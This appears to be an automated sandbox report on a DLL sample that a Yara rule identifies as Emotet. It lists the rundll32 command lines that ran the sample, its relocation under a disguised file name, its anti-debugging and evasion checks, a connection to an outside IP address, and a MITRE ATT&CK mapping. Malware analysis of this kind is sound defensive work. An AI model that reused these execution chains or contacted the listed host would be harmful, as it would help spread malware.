                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@17/0@0/20
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A742 _memset,GetDiskFreeSpaceA,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1B54 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000A0F4 __EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,
                      Source: rundll32.exe, 00000004.00000002.710493956.0000000003151000.00000004.00000020.sdmpBinary or memory string: penSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBPA
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_CURSOR
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_BITMAP
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_ICON
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_MENU
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_DIALOG
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_STRING
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_ACCELERATOR
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: section name: RT_GROUP_ICON
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003F395 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003EF21 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D1229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D1229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED1229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004BC7A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: real checksum: 0xb4236 should be: 0xbc245
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gisJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000BD3C IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022F30 GetParent,GetParent,IsIconic,GetParent,
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 4244Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.2 %
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A2F3 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C lstrlenA,FindFirstFileA,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F3E9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1A80 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: svchost.exe, 0000000C.00000002.841567859.000001A76FC8A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.841663587.000001A76FCEC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10041482 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004BC7A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003D032 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EDE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EDE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEDE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004A43B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10041482 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10039F21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: rundll32.exe, 00000007.00000002.1231869859.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10048EDF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10045F08 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003D032 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4910000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.59a0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5bd0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.34d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4710000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.42d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.58b0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ed0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a70000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4630000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3fc0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5840000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5600000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ac0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000B92A __EH_prolog3_GS,lstrlenW,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1Path InterceptionProcess Injection112Masquerading2Input Capture2System Time Discovery2Remote ServicesInput Capture2Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerSecurity Software Discovery31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery27Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
